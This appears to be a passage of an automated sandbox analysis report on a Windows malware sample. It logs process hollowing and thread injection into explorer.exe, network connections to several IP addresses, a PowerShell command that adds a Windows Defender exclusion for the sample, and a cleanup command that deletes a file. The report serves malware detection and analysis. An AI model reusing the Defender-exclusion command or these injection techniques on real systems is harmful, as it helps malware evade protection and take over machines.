Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199EA80 mov eax, dword ptr fs:[00000030h]	5_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A64A80 mov eax, dword ptr fs:[00000030h]	5_2_01A64A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01998AA0 mov eax, dword ptr fs:[00000030h]	5_2_01998AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01998AA0 mov eax, dword ptr fs:[00000030h]	5_2_01998AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019E6AA4 mov eax, dword ptr fs:[00000030h]	5_2_019E6AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01990AD0 mov eax, dword ptr fs:[00000030h]	5_2_01990AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C4AD0 mov eax, dword ptr fs:[00000030h]	5_2_019C4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C4AD0 mov eax, dword ptr fs:[00000030h]	5_2_019C4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019E6ACC mov eax, dword ptr fs:[00000030h]	5_2_019E6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019E6ACC mov eax, dword ptr fs:[00000030h]	5_2_019E6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019E6ACC mov eax, dword ptr fs:[00000030h]	5_2_019E6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CAAEE mov eax, dword ptr fs:[00000030h]	5_2_019CAAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CAAEE mov eax, dword ptr fs:[00000030h]	5_2_019CAAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B4A35 mov eax, dword ptr fs:[00000030h]	5_2_019B4A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B4A35 mov eax, dword ptr fs:[00000030h]	5_2_019B4A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1CA11 mov eax, dword ptr fs:[00000030h]	5_2_01A1CA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BEA2E mov eax, dword ptr fs:[00000030h]	5_2_019BEA2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CCA24 mov eax, dword ptr fs:[00000030h]	5_2_019CCA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0A5B mov eax, dword ptr fs:[00000030h]	5_2_019A0A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A0A5B mov eax, dword ptr fs:[00000030h]	5_2_019A0A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3EA60 mov eax, dword ptr fs:[00000030h]	5_2_01A3EA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01996A50 mov eax, dword ptr fs:[00000030h]	5_2_01996A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01996A50 mov eax, dword ptr fs:[00000030h]	5_2_01996A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01996A50 mov eax, dword ptr fs:[00000030h]	5_2_01996A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01996A50 mov eax, dword ptr fs:[00000030h]	5_2_01996A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01996A50 mov eax, dword ptr fs:[00000030h]	5_2_01996A50

Source: C:\Users\user\Desktop\z2______________________________.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\z2______________________________.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.86.173.213 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.19 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.9.22 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\z2______________________________.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z2______________________________.exe
Source: C:\Users\user\Desktop\z2______________________________.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z2______________________________.exe			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 2580			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 2580			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: ED0000

Jump to behavior

Source: C:\Users\user\Desktop\z2______________________________.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z2______________________________.exe	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: explorer.exe, 00000006.00000003.3429507996.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1672845472.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107844598.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.1663672880.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4099729224.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.1662873217.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4099296123.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000006.00000000.1663672880.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4099729224.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000000.1663672880.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4099729224.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Users\user\Desktop\z2______________________________.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
